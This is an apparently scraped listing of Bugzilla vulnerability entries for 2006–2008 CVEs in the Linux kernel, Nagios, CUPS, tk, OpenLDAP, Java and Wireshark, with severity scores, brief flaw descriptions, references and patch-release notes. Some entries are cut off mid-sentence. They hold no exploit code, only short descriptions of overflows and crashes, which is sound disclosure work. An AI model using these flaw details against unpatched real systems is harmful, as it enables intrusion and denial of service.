CVE-2007-5966 kernel: non-root can trigger cpu_idle soft lockup
bugzilla·2008-06-27·CVSS 7.2
CVE-2007-5966 [HIGH] CVE-2007-5966 kernel: non-root can trigger cpu_idle soft lockup
CVE-2007-5966 kernel: non-root can trigger cpu_idle soft lockup
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-5966 to the following vulnerability:
Integer overflow in the hrtimer_start function in kernel/hrtimer.c in the Linux kernel before 2.6.23.10 allows local users to execute arbitrary code or cause a denial of service (panic) via a large relative timeout value. NOTE: some of these details are obtained from third party information.
Refences:
http://www.securityfocus.com/archive/1/archive/1/485282/100/0/threaded
http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.23.10
https://issues.rpath.com/browse/RPL-2038
http://www.debian.org/security/2007/dsa-1436
http://lists.opensuse.org/opensuse-security-announce/2008-02/msg00002.html
http://www.ubuntu.com/usn/usn-57
Bugzilla
CVE-2007-5803 nagios: XSS vulnerability
bugzilla·2008-05-14·CVSS 4.3
CVE-2007-5803 [MEDIUM] CVE-2007-5803 nagios: XSS vulnerability
CVE-2007-5803 nagios: XSS vulnerability
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-5803 to the following vulnerability:
Cross-site scripting (XSS) vulnerability in Nagios allows remote
attackers to inject arbitrary web script or HTML via unknown vectors,
a different vulnerability than CVE-2007-5624 and CVE-2008-1360.
References:
http://lists.opensuse.org/opensuse-security-announce/2008-05/msg00000.html
http://secunia.com/advisories/30202
Note:
This was reported as an incomplete fix for CVE-2007-5624.
Discussion:
Created attachment 305354
SuSE patch
This is *NOT* fixed in the upstream version 2.11.
(Extracted from SuSE nagios-2.9-48.4.src.rpm)
---
Now fixed upstream in 3.0.2 and 2.12:
http://www.nagios.org/development/history/nagios-3x.php
http://www.nag
Bugzilla
CVE-2008-1373 cups: overflow in gif image filter
bugzilla·2008-03-20·CVSS 2.6
CVE-2008-1373 [LOW] CVE-2008-1373 cups: overflow in gif image filter
CVE-2008-1373 cups: overflow in gif image filter
It was discovered that GIF parsing code used by CUPS printing system is affected
by similar issue as GIF parsers used by gd / netpbm / tk / SDL_image.
Value of code_size read from GIF image is not properly validate before being
used to initialize table array in gif_read_lzw(), causing a static buffer overflow.
Issue is similar to:
CVE-2006-4484 (gd), CVE-2007-6697 (SDL_image), CVE-2008-0553 (tk), CVE-2008-0554
(netpbm)
Discussion:
Created attachment 298680
Proposed patch
Similar to fixed used in gd / tk / netpbm / SDL_image.
---
Tracked upstream via: http://www.cups.org/str.php?L2765
---
cups-1.2.12-10.fc7 has been submitted as an update for Fedora 7
---
cups-1.3.6-4.fc8 has been pushed to the Fedora 8 stable repository. If probl
Bugzilla
CVE-2008-0658 openldap: slapd crash on modrdn operation with NOOP control on entry in bdb storage
bugzilla·2008-02-08·CVSS 4.0
CVE-2008-0658 [MEDIUM] CVE-2008-0658 openldap: slapd crash on modrdn operation with NOOP control on entry in bdb storage
CVE-2008-0658 openldap: slapd crash on modrdn operation with NOOP control on entry in bdb storage
While preparing the patch for CVE-2007-6698 (issue allowing slapd daemon crash
using modify requests with NOOP control, tracked via bug bug #431203), it was
discovered, that similar crash can be achieved using modrdn operation with NOOP
control.
Upstream bug report:
http://www.openldap.org/its/index.cgi/Software%20Bugs?id=5358
Patch applied in upstream CVS:
http://www.openldap.org/devel/cvsweb.cgi/servers/slapd/back-bdb/modrdn.c.diff?r1=1.197&r2=1.198&f=h
Discussion:
Similar to CVE-2007-6698, this issue does not affect OpenLDAP packages as
shipped in Red Hat Enterprise Linux 2.1 and 3, as they do not support NOOP
controls. Packages shipped in Red Hat Enterprise Linux 4 and 5 are affected.
Bugzilla
CVE-2008-0553 tk: GIF handling buffer overflow
bugzilla·2008-02-05·CVSS 2.6
CVE-2008-0553 [LOW] CVE-2008-0553 tk: GIF handling buffer overflow
CVE-2008-0553 tk: GIF handling buffer overflow
tk GIF handling code is based on the same code as used by gd and SDL_image and
is affected by the overflow known as CVE-2006-4484 and CVE-2007-6697.
ReadImage function in tkImgGIF.c does not properly check the value of
initialCodeSize value read from GIF image before using it as upper bound during
the initialization of append array. This can result in stack buffer overflow.
Upstream fix:
http://tktoolkit.cvs.sourceforge.net/tktoolkit/tk/generic/tkImgGIF.c?r1=1.40&r2=1.41
This is expected to be included in upstream tk version 8.5.1.
Related issues:
CVE-2006-4484 (gd), CVE-2007-6697 (SDL_image), CVE-2008-0554 (netpbm)
Discussion:
perl-Tk uses embedded copy of tk source code and is affected by this problem
too. Adding perl-Tk maintainers t
Bugzilla
CVE-2008-0628 java-1.6.0 default external entity processing
bugzilla·2008-02-04·CVSS 3.5
CVE-2008-0628 [LOW] CVE-2008-0628 java-1.6.0 default external entity processing
CVE-2008-0628 java-1.6.0 default external entity processing
Sun describes a 1.6.0-only (1.4, 1.5 not affected) XML processing vulnerability
(insecure default) at
http://sunsolve.sun.com/search/document.do?assetkey=1-66-231246-1.
This bug may cause effects similar to CVE-2007-5461.
Vendor Description:
The Java Runtime Environment (JRE) by default allows external entity references
to be processed. To turn off processing of external entity references, sites can
set the "external general entities" property to FALSE. This property is provided
since it may be possible to leverage the processing of external entity
references to access certain URL resources (such as some files and web pages) or
create a Denial of Service (DoS) condition on the system running the JRE. A
defect in the JRE allows
Bugzilla
CVE-2007-6441 wireshark WiMAX dissector possible crash
bugzilla·2008-01-02·CVSS 3.3
CVE-2007-6441 [LOW] CVE-2007-6441 wireshark WiMAX dissector possible crash
CVE-2007-6441 wireshark WiMAX dissector possible crash
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-6441 to the following vulnerability:
The WiMAX dissector in Wireshark (formerly Ethereal) 0.99.6 allows remote attackers to cause a denial of service (crash) via unknown vectors related to "unaligned access on some platforms."
References:
http://www.wireshark.org/security/wnpa-sec-2007-03.html
Discussion:
This issue was addressed in:
Red Hat Enterprise Linux:
http://rhn.redhat.com/errata/RHSA-2008-0058.html
Bugzilla
CVE-2007-6119 wireshark DCP ETSI dissector flaws
bugzilla·2007-11-23·CVSS 7.8
CVE-2007-6119 [HIGH] CVE-2007-6119 wireshark DCP ETSI dissector flaws
CVE-2007-6119 wireshark DCP ETSI dissector flaws
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-6119 to the following vulnerability:
The DCP ETSI dissector in Wireshark (formerly Ethereal) 0.99.6 allows
remote attackers to cause a denial of service (long loop and resource
consumption) via unknown vectors.
Discussion:
wireshark-0.99.7-2.fc8 has been pushed to the Fedora 8 stable repository. If problems still persist, please make note of it in this bug report.
---
wireshark-0.99.7-1.fc7 has been pushed to the Fedora 7 stable repository. If problems still persist, please make note of it in this bug report.
---
This issue was addressed in:
Red Hat Enterprise Linux:
http://rhn.redhat.com/errata/RHSA-2008-0058.html
Fedora:
https://admin.fedoraproject.org/updates/F
Bugzilla
CVE-2007-6121 wireshark RPC Portmap flaws
bugzilla·2007-11-23·CVSS 5.0
CVE-2007-6121 [MEDIUM] CVE-2007-6121 wireshark RPC Portmap flaws
CVE-2007-6121 wireshark RPC Portmap flaws
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-6121 to the following vulnerability:
Wireshark (formerly Ethereal) 0.8.16 to 0.99.6 allows remote attackers
to cause a denial of service (crash) via a malformed RPC Portmap
packet.
Discussion:
wireshark-0.99.7-2.fc8 has been pushed to the Fedora 8 stable repository. If problems still persist, please make note of it in this bug report.
---
wireshark-0.99.7-1.fc7 has been pushed to the Fedora 7 stable repository. If problems still persist, please make note of it in this bug report.
---
This issue was addressed in:
Red Hat Enterprise Linux:
http://rhn.redhat.com/errata/RHSA-2008-0058.html
http://rhn.redhat.com/errata/RHSA-2008-0059.html
Fedora:
https://admin.fedoraproject.o
Bugzilla
CVE-2007-6112 wireshark ppp flaws
bugzilla·2007-11-23·CVSS 10.0
CVE-2007-6112 [CRITICAL] CVE-2007-6112 wireshark ppp flaws
CVE-2007-6112 wireshark ppp flaws
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-6112 to the following vulnerability:
Buffer overflow in the PPP dissector Wireshark (formerly Ethereal)
0.99.6 allows remote attackers to cause a denial of service (crash)
and possibly execute arbitrary code via unknown vectors.
Discussion:
wireshark-0.99.7-2.fc8 has been pushed to the Fedora 8 stable repository. If problems still persist, please make note of it in this bug report.
---
wireshark-0.99.7-1.fc7 has been pushed to the Fedora 7 stable repository. If problems still persist, please make note of it in this bug report.
---
This issue was addressed in:
Red Hat Enterprise Linux:
http://rhn.redhat.com/errata/RHSA-2008-0058.html
Fedora:
https://admin.fedoraproject.org/update
Bugzilla
CVE-2006-4538 kernel: Local DoS with corrupted ELF
bugzilla·2007-09-13·CVSS 4.9
CVE-2006-4538 [MEDIUM] CVE-2006-4538 kernel: Local DoS with corrupted ELF
CVE-2006-4538 kernel: Local DoS with corrupted ELF
Already fixed for RHEL4, but not for RHEL3/2.1-ia64. See bz#205335 for
EL4 reproducer.
From Kirill Korotaev:
When running on IA64 or SPARC platforms, local users can cause a denial of
service via a malformed ELF file and then triggered by cross-region mappings.
http://lkml.org/lkml/2006/9/4/116
Discussion:
This issue has been addressed in following products:
Red Hat Linux Enterprise 2.1
Red Hat Linux Enterprise 3
Via RHSA-2007:1049 available at https://rhn.redhat.com/errata/RHSA-2007-1049.html and RHSA-2008:0787 available at https://rhn.redhat.com/errata/RHSA-2008-0787.html
2007-04-12
Published